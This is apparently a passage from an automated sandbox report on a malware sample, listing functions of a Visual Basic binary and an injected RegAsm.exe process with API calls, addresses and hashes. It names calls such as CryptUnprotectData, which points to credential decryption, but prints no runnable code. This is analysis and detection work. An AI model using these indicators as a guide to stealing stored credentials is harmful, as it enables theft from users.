__vbaHresultCheckObj.MSVBVM60(00000000,0299004C,00410EC8,00000014), ref: 004148C7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410EE8,000000B8), ref: 004148F5
__vbaFreeObj.MSVBVM60 ref: 004148FA
__vbaHresultCheckObj.MSVBVM60(00000000,00401160,00410914,000006FC), ref: 0041491C
__vbaFreeStr.MSVBVM60(0041495A), ref: 00414953

Strings

12:12:12, xrefs: 00414847
, xrefs: 004147F2

Memory Dump Source

Source File: 00000000.00000002.1173986101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1173955001.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1174112014.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1174144140.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#541#606#648New2
String ID: $12:12:12
API String ID: 4248556555-1101392946
Opcode ID: 684de45ead30eddb0628d4cf1cb0a3cd4f2cb0cbeb8b68ab22907794830e529b
Instruction ID: 0c58ea7e028fab494be86df3efd621ba65edb83486e14d62d930ab9e8dd34979
Opcode Fuzzy Hash: 684de45ead30eddb0628d4cf1cb0a3cd4f2cb0cbeb8b68ab22907794830e529b
Instruction Fuzzy Hash: 45415174940219EFCB00DFA5DE89ADEBBB8FF58704F10411AE106B72A0DB745985CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00414D50, Relevance: 16.6, APIs: 11, Instructions: 89COMMON

Download Yara Rule

APIs

#632.MSVBVM60(?,?,00000000,?), ref: 00414DB0
__vbaStrVarVal.MSVBVM60(?,?), ref: 00414DBE
#516.MSVBVM60(00000000), ref: 00414DC5
__vbaFreeStr.MSVBVM60 ref: 00414DD9
__vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 00414DE9
#617.MSVBVM60(00000002,?,000000FF), ref: 00414E0A
#617.MSVBVM60(00000002,?,00000000), ref: 00414E28
__vbaStrVarMove.MSVBVM60(00000002), ref: 00414E32
__vbaStrMove.MSVBVM60 ref: 00414E3D
__vbaFreeVar.MSVBVM60 ref: 00414E46
__vbaFreeStr.MSVBVM60(00414E7A), ref: 00414E73

Memory Dump Source

Source File: 00000000.00000002.1173986101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1173955001.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1174112014.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1174144140.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#617Move$#516#632List
String ID:
API String ID: 3155365896-0
Opcode ID: 932eb668ff17ed64adae54c77b8e402ece5888d99afb6bd268984d711da5926c
Instruction ID: a6d17c38310a98bedcfe9e67ee839cc925cda2e1aad737b3a6a2107308b7f2bb
Opcode Fuzzy Hash: 932eb668ff17ed64adae54c77b8e402ece5888d99afb6bd268984d711da5926c
Instruction Fuzzy Hash: 1231C5B1C00219EFCB04DF94DD89DEEBBB8FF58705F10422AE602A6164E7B41549CB94

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 2796 Parent PID: 8172 RegAsm.exeCOMMON

Executed Functions

Function 00C46948, Relevance: 4.0, APIs: 2, Instructions: 963libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00C46A14
LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: 87516431f98effcf43fe90e5474dc85ba03e9ed253ba763397289b9750812e9b
Instruction ID: 5a0ab0fbd61455a3d634579c84e0eb57c9a1bba8c572ed4a8a0911353013ee72
Opcode Fuzzy Hash: 87516431f98effcf43fe90e5474dc85ba03e9ed253ba763397289b9750812e9b
Instruction Fuzzy Hash: 12A21774A09228CFDB64DF70C898B9DB7B6BF48305F2181EAD54AA3254CB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 014A9508, Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 014A9CBD

Memory Dump Source

Source File: 0000001B.00000002.5628796949.00000000014A0000.00000040.00000010.sdmp, Offset: 014A0000, based on PE: false

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: a6f02992eaca60ef67294867d0c380eeca357f6bc521fe9c3eec58e2f0e4d6ae
Instruction ID: da54aa720b745b3b97d3c26e6111b2e6619024a5673de334560c1b41475cc8f5
Opcode Fuzzy Hash: a6f02992eaca60ef67294867d0c380eeca357f6bc521fe9c3eec58e2f0e4d6ae
Instruction Fuzzy Hash: 531126B68006099FCB10CF99C944BDEBFF5EF88324F15841AEA14A7210C339AA54DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 014A9C50, Relevance: 1.6, APIs: 1, Instructions: 54encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 014A9CBD

Memory Dump Source

Source File: 0000001B.00000002.5628796949.00000000014A0000.00000040.00000010.sdmp, Offset: 014A0000, based on PE: false

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 51bfe5f1480d3900a20111e5eb19d2f8bce35267288998d7f88f2299a06bb994
Instruction ID: b8341bbd8ab552de5659cb76985815a0dd88ef897a756cc17ae02ce8f58d86a8
Opcode Fuzzy Hash: 51bfe5f1480d3900a20111e5eb19d2f8bce35267288998d7f88f2299a06bb994
Instruction Fuzzy Hash: 741137B68002499FCF10CF99C944BDEBFF9EF48324F15841AE654A7210C339A954DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C46969, Relevance: 3.6, APIs: 2, Instructions: 637libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00C46A14
LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: 2ed9611748af31f037bd0ab2881bccb1c2842d50074fa3f87625d8998ca11d28
Instruction ID: da3d0c5db20943cf0752e60118570501c45e959b899c68e0e8e16f49ca21f1a1
Opcode Fuzzy Hash: 2ed9611748af31f037bd0ab2881bccb1c2842d50074fa3f87625d8998ca11d28
Instruction Fuzzy Hash: 86620574A09224CFDB25DF70C898A9DB7B6BF48305F2181EAD54AA3344CB349E82DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C469B0, Relevance: 3.6, APIs: 2, Instructions: 630libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00C46A14
LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: 3755a124947ec6f62a0811d217cfed0910d9319c36b15a03e2f821d2909c2661
Instruction ID: 6b179cfea4d5b79697ba572a4bfca8845e4599c2a6e621f87488cd1864b4b881
Opcode Fuzzy Hash: 3755a124947ec6f62a0811d217cfed0910d9319c36b15a03e2f821d2909c2661
Instruction Fuzzy Hash: 03621674A09224CFDB25DF70C898A9DB7B6BF48305F2181EAD50AA3344CB349E81DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C469F7, Relevance: 3.6, APIs: 2, Instructions: 621libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00C46A14
LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: bfc054203128d0bd75619f81890a05f8f8d40924e17957a2dd382c54fd48d575
Instruction ID: 631847e58b404a9b0c5aa48cf78a90937be7a2642d582d15ed7d8840423dbc9b
Opcode Fuzzy Hash: bfc054203128d0bd75619f81890a05f8f8d40924e17957a2dd382c54fd48d575
Instruction Fuzzy Hash: E7521574A09224CFDB65DF70C898A9DB7B6BF48305F2181EAD50AA3344CB349E82DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00D0BE5E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 85threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32 ref: 00D0BED8

Strings

?g}Q, xrefs: 00D0C00D

Memory Dump Source

Source File: 0000001B.00000002.5622389214.0000000000D0B000.00000040.00000001.sdmp, Offset: 00D0B000, based on PE: false

Similarity

API ID: TerminateThread
String ID: ?g}Q
API String ID: 1852365436-1114213527
Opcode ID: be4e905b771b33935b2e667e46026ebc83ef91475e74595b0cf8aaf6db9f3728
Instruction ID: 37664c8d06276baee748042a56008bf0a41362e900bfa8757c10207d703ed12c
Opcode Fuzzy Hash: be4e905b771b33935b2e667e46026ebc83ef91475e74595b0cf8aaf6db9f3728
Instruction Fuzzy Hash: 69216B752143579FC7248F24CDE07EA37A2EF96310F59826ADC4A8F2A1D3359885CB27

Uniqueness

Uniqueness Score: -1.00%

Function 00C46A4B, Relevance: 2.1, APIs: 1, Instructions: 612libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1267c07dbc903c3b8e557d6a40ca9bcbd22a003df8533be6ebe181338e3e3fd6
Instruction ID: 12e51bf701db34fc8ea4a3655d8185164bfd268b5db225ca2509518651e17dba
Opcode Fuzzy Hash: 1267c07dbc903c3b8e557d6a40ca9bcbd22a003df8533be6ebe181338e3e3fd6
Instruction Fuzzy Hash: FE520574A09224CFDB24DF70C898A9DB7B6BF48305F2181EAD54AA3344CB349E82DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C46A92, Relevance: 2.1, APIs: 1, Instructions: 605libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 28e22b626898be199ba74a37d873a55129b9704a991b074752bc3129bb741902
Instruction ID: 8f1ebe54296c56affcb5716ecf02b7cbedafc960f6b7042fe332a15a9871aa32
Opcode Fuzzy Hash: 28e22b626898be199ba74a37d873a55129b9704a991b074752bc3129bb741902
Instruction Fuzzy Hash: 11520574A09224CFDB24DF70C898A9DB7B6BF48305F2181EAD54AA3344CB349E82DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C46AD9, Relevance: 2.1, APIs: 1, Instructions: 596libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dca40df20483d81ba1e60fba69c66d5335317c802308f3c89a3cad702725206
Instruction ID: 5c9215a1da40e377c0e36baf1904835b578863e37a7547c594bd7879387c0712
Opcode Fuzzy Hash: 4dca40df20483d81ba1e60fba69c66d5335317c802308f3c89a3cad702725206
Instruction Fuzzy Hash: 43520474A09224CFDB64DF70C898A9DB7B6BF48305F2181EAD54AA3344CB349E82DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C46B17, Relevance: 2.1, APIs: 1, Instructions: 591libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a321fab66388b951e5396ceec9c63304f256e8857b5e1f35f8e4ce59b503b0ff
Instruction ID: e1a06201e82558557487816931ee24de52b6d298529c25917c20cefd40e5f33b
Opcode Fuzzy Hash: a321fab66388b951e5396ceec9c63304f256e8857b5e1f35f8e4ce59b503b0ff
Instruction Fuzzy Hash: 85520474A09224CFDB64DF70C898A9DB7B6BF48305F2181EAD54AA3344CB349E82DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C46B5E, Relevance: 2.1, APIs: 1, Instructions: 584libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a540a4fc6351b9a70346d95d79f5a9b2e8caf76782a984610c99de918d9aa987
Instruction ID: ee111cd3f0847254149d2a2b85f80416f216b6d6b132d4fedfb3e4c2aacb7418
Opcode Fuzzy Hash: a540a4fc6351b9a70346d95d79f5a9b2e8caf76782a984610c99de918d9aa987
Instruction Fuzzy Hash: 8F52F474A09224CFDB64DF70C898A9DB7B6BF48305F2181EAD54AA3344CB349E82DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C46BA5, Relevance: 2.1, APIs: 1, Instructions: 577libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b649f48656ad5b3741fc6fc152cf3655df166b67a154191acb5079814b933f33
Instruction ID: 35d43d8a321c0417acab45d2bd856dbe1a82ed3b1136dee7255395a6978ff63c
Opcode Fuzzy Hash: b649f48656ad5b3741fc6fc152cf3655df166b67a154191acb5079814b933f33
Instruction Fuzzy Hash: BE52F475A09224CFDB64DF70C898B9DB7B6BF48305F2181EAD54AA3244CB349E82CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C46BEC, Relevance: 2.1, APIs: 1, Instructions: 570libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f7109c9a949eb1ca884430994143ff01b5bb0f8a572397e11311d46897a65427
Instruction ID: 31a54b4560509be095a5ce964e5e8b8e0ba596ed63e8952ba33e3d7480396c6c
Opcode Fuzzy Hash: f7109c9a949eb1ca884430994143ff01b5bb0f8a572397e11311d46897a65427
Instruction Fuzzy Hash: 4F42F575A09224CFDB64DF70C898B9DB7B6BF48305F2181EAD54AA3244CB349E82CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C46C33, Relevance: 2.1, APIs: 1, Instructions: 563libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d0947f7d7a828f3945eacc37503e3dd74c47cb28f25a4a7f0f190a769f82bc00
Instruction ID: d104be0ccf6993f1c29ca1bf1fcef6efa88672702faa9efdc421ac7bf71894de
Opcode Fuzzy Hash: d0947f7d7a828f3945eacc37503e3dd74c47cb28f25a4a7f0f190a769f82bc00
Instruction Fuzzy Hash: 1A42F575A09224CFDB64DF70C898B9DB7B6BF48305F2181EAD50AA3244CB349E82CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C46C7A, Relevance: 2.1, APIs: 1, Instructions: 556libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d34c696b3f375df76ad4b0d78c00f6895454c113639848617b3a243232c1a211
Instruction ID: 9b339d24ca3e3f1739875ecaf0b1efee478fb25d4a76e918a94089b1257ee6c8
Opcode Fuzzy Hash: d34c696b3f375df76ad4b0d78c00f6895454c113639848617b3a243232c1a211
Instruction Fuzzy Hash: A642E575A09224CFDB64DF70C898B9DB7B6BF48305F2181EAD64AA3244CB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C46CC1, Relevance: 2.0, APIs: 1, Instructions: 549libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 72193e244501999f3da739b42ee1aa7793f4f9c1156ecc559565c6ae8e5d58a2
Instruction ID: 8836698c6c0ebe3605b9d03a09e6e76354d8ec0f5fac1d6380153a2936041c27
Opcode Fuzzy Hash: 72193e244501999f3da739b42ee1aa7793f4f9c1156ecc559565c6ae8e5d58a2
Instruction Fuzzy Hash: EA42E575A09224CFDB64DF70C898B9DB7B6BF48305F2181EAD60AA3254CB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C46D08, Relevance: 2.0, APIs: 1, Instructions: 542libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ce6758f6d1eb3c4962768c2f28b5fe13f88b3355eea4ecc9100326ab2e5cea16
Instruction ID: 29c0bb6b974f666715ed3fe48bd2d66cf44eca638725f4e4a5cef7f69ebcc4cf
Opcode Fuzzy Hash: ce6758f6d1eb3c4962768c2f28b5fe13f88b3355eea4ecc9100326ab2e5cea16
Instruction Fuzzy Hash: F442E575A09224CFDB64DF70C898B9DB7B6BF48305F2181EAD60AA3254CB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C46D4F, Relevance: 2.0, APIs: 1, Instructions: 535libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 22236c4c60b0c51c872da6e41f216316a20fce1af8da9d8f221c02557a781a3f
Instruction ID: 2a9fb7705417f615186293132d7cabefe117d5ab4faaabfd15f26381d02cd3cc
Opcode Fuzzy Hash: 22236c4c60b0c51c872da6e41f216316a20fce1af8da9d8f221c02557a781a3f
Instruction Fuzzy Hash: 5842E575A09224CFDB64DF70C898B9DB7B6BF48305F2181EAD60AA3254CB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C46D96, Relevance: 2.0, APIs: 1, Instructions: 528libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c8477ae3ac90df6a046a8104b3d9bf31bc3f8d149620480fefdf94af6c847573
Instruction ID: f703292b3422a74f416794a651525b4650a1af3ff9bfca7b51340a2bdd7156cf
Opcode Fuzzy Hash: c8477ae3ac90df6a046a8104b3d9bf31bc3f8d149620480fefdf94af6c847573
Instruction Fuzzy Hash: 4942E575A09224CFDB64DF70C898B9DB7B6BF48305F2181EAD60AA3244DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C46DDD, Relevance: 2.0, APIs: 1, Instructions: 521libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 031d72c6c1b3c05e37600fb4798f58ec80a73339694f04f33b66d83d015b13e9
Instruction ID: 53b94dff13a552a31a16baa5b044db57fe865fedd9ab1d892d74e0e4f01997b1
Opcode Fuzzy Hash: 031d72c6c1b3c05e37600fb4798f58ec80a73339694f04f33b66d83d015b13e9
Instruction Fuzzy Hash: A132F675A09224CFDB64DF70C898B9DB7B6BF48305F2181EAD60AA3244DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C46E24, Relevance: 2.0, APIs: 1, Instructions: 514libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 290834dced5567926cd154cfc75e8f24f71443507f3a2325b315189a773f812d
Instruction ID: dd877f052be14a9639b738a06cec2793329b75ce697276c06094fbdb0e5695a8
Opcode Fuzzy Hash: 290834dced5567926cd154cfc75e8f24f71443507f3a2325b315189a773f812d
Instruction Fuzzy Hash: F732E675A09224CFDB64DF70C898B9DB7B6BF48305F2181EAD50AA3244DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C46E6B, Relevance: 2.0, APIs: 1, Instructions: 505libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c9ae2a855fd36f6e041be6949f090ae1ff57e61d4ce7c80a4b7d1cd6f4445767
Instruction ID: 19c70e6fc8012d3e891013ccfd05e4f35c03c04045b170de77aa72792d322f43
Opcode Fuzzy Hash: c9ae2a855fd36f6e041be6949f090ae1ff57e61d4ce7c80a4b7d1cd6f4445767
Instruction Fuzzy Hash: FD3206B5A09224CFDB64DF70C898B9DB7B6BF48305F2181EAD50AA3244CB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C46EA9, Relevance: 2.0, APIs: 1, Instructions: 500libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5aa82f202e72e776eada89b3bcc95c9b10b1c4fc535e557abb3d17d363ba5c70
Instruction ID: ac7d3419e64f59b81d89b231be0094b2126bcc27395a9ccea22816b2764fc70e
Opcode Fuzzy Hash: 5aa82f202e72e776eada89b3bcc95c9b10b1c4fc535e557abb3d17d363ba5c70
Instruction Fuzzy Hash: B832E6B5A09224CFDB64DF70C898B9DB7B6BF48305F2181EAD50AA3244DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C46EF0, Relevance: 2.0, APIs: 1, Instructions: 491libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7cb3823e682d198e993a232e78c199ab6f35f693fa6d8fb4c9e64beb8e741d19
Instruction ID: 294aa9d7440054ce8045514f08989f057511d6f1e1c5b79844d7646ed8b3f7a9
Opcode Fuzzy Hash: 7cb3823e682d198e993a232e78c199ab6f35f693fa6d8fb4c9e64beb8e741d19
Instruction Fuzzy Hash: D932F775A09224CFDB64DF70C898B9DB7B6BF48305F2181EAD50AA3244DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C46F2E, Relevance: 2.0, APIs: 1, Instructions: 486libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3fc91408bc08adaebc29ffffa2cf0611a20ceaa100c00cba3bbc8661daf66510
Instruction ID: c942fa70f2790df56b922756de0f951915333d7e5cbd8f26aeabd7df08c62297
Opcode Fuzzy Hash: 3fc91408bc08adaebc29ffffa2cf0611a20ceaa100c00cba3bbc8661daf66510
Instruction Fuzzy Hash: AF32F7B5A09224CFDB64DF70C898B9DB7B6BF48305F2181EAD50AA3244DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C46F75, Relevance: 2.0, APIs: 1, Instructions: 479libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c066d033932fc1b75ea6e6b0be304848ebb4113729f73ffbff95ab9dadd921f9
Instruction ID: cf064b8b5360c5aac1493ec4746cef69ff97359517d25f5abd00df08efea76ad
Opcode Fuzzy Hash: c066d033932fc1b75ea6e6b0be304848ebb4113729f73ffbff95ab9dadd921f9
Instruction Fuzzy Hash: 1A22F7B5A09224CFDB64DF70C898B9DB7B6BF48305F2181EAD50AA3244DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C46FBC, Relevance: 2.0, APIs: 1, Instructions: 472libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6bf589cbf52bd47f679c72767fb32f6291bc9801a01b7af2aba6c8c2cc4b0ba5
Instruction ID: 5d537b5e20bc7b596d713cd6f70504a74779c8d09ab280be80700b8b598e37d0
Opcode Fuzzy Hash: 6bf589cbf52bd47f679c72767fb32f6291bc9801a01b7af2aba6c8c2cc4b0ba5
Instruction Fuzzy Hash: 8A22F875A09224CFDB64DF70C898B9DB7B6BF88305F2181EAD50AA3244DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C47003, Relevance: 2.0, APIs: 1, Instructions: 465libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c043498250de9923387f40ee9c034ce65f0c37aa95932ffc675b97f0a421306c
Instruction ID: b6c12142e691d9c5154b6d0c6c0c431cc1c89849872d8401c4114ce51c7e374e
Opcode Fuzzy Hash: c043498250de9923387f40ee9c034ce65f0c37aa95932ffc675b97f0a421306c
Instruction Fuzzy Hash: 07220875A09224CFDB64DF70C898B9DB7B6BF48305F2181EAD50AA3244DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C4704A, Relevance: 2.0, APIs: 1, Instructions: 458libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f7a05cd5f0a9a751d088b2d020dd41619a5f96a99b3b564c4125a59187ac6bf9
Instruction ID: 0ab5085d4e4350a7327fa898a54a8347a107ad3833d407d365065d60f6293c0a
Opcode Fuzzy Hash: f7a05cd5f0a9a751d088b2d020dd41619a5f96a99b3b564c4125a59187ac6bf9
Instruction Fuzzy Hash: 5C220975A09224CFDB24DF70C898B9DB7B6BF48305F2181EAD50AA3244DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C47091, Relevance: 2.0, APIs: 1, Instructions: 451libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C47717

Memory Dump Source

Source File: 0000001B.00000002.5621537960.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4403a699949392977ab384b9331bcb709607c470936c33713c7bfdf362f3b5f3
Instruction ID: 84725c1978a4f4e3b788cd15c17b478b06b6ab3787f6a9154d654f093ffc8c41
Opcode Fuzzy Hash: 4403a699949392977ab384b9331bcb709607c470936c33713c7bfdf362f3b5f3
Instruction Fuzzy Hash: D5220975A09224CFDB64DF70C898B9DB7B6BF48305F2181EAD50AA3244DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00C470DB, Relevance: 1.9, APIs: 1, Instructions: 442libraryCOMMON

